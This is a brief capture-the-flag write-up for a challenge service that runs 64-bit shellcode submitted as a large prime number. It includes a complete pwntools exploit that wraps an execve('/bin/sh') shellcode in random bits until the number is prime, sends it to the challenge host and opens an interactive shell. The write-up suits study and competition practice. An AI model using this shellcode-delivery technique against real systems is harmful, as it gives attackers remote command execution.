Category : PWN

Phreaks 2600

You can find this writeup at Phreaks 2600 website

Context

This challenge was a service that accepts a 64 bits x86 shellcode as a big prime number.

Lazy solving

Because i was too lazy, I used bruteforce to solve the challenge :

• Generate a x86 64 bits shellcode
• Generate a big odd random number shifted by 800 bits to the left
• Add the big number and the shellcode and cross fingers that it is a prime number. If not, restart the operations.

Here is the visual explanation of the final big prime number

[A][X...X][E]

A : Shellcode
X : 800 Random bits
E : Last digit that is always odd (because all prime numbers are odd)

Exploit

Here is the exploit

 11
 2import secrets
 3from sympy import isprime
 4from pwn import *
 5
 6def generate_shellcode(bits):
 7    shellcode = asm(shellcraft.amd64.execve("/bin/sh"),arch="amd64")
 8    while True:
 9        n = secrets.randbits(bits) | (1 << (bits - 1)) | 1 # always odd
10        z = int(hex((int.from_bytes(shellcode) * 1<<(bits)) + n),16)
11        if isprime(z):
12            return z
13
14p = remote("chall.fcsc.fr",2100)
15p.send(str(generate_shellcode(800)).encode()) 
16p.interactive()

Notes

I get the flag in less than a minute. Very fast and effective.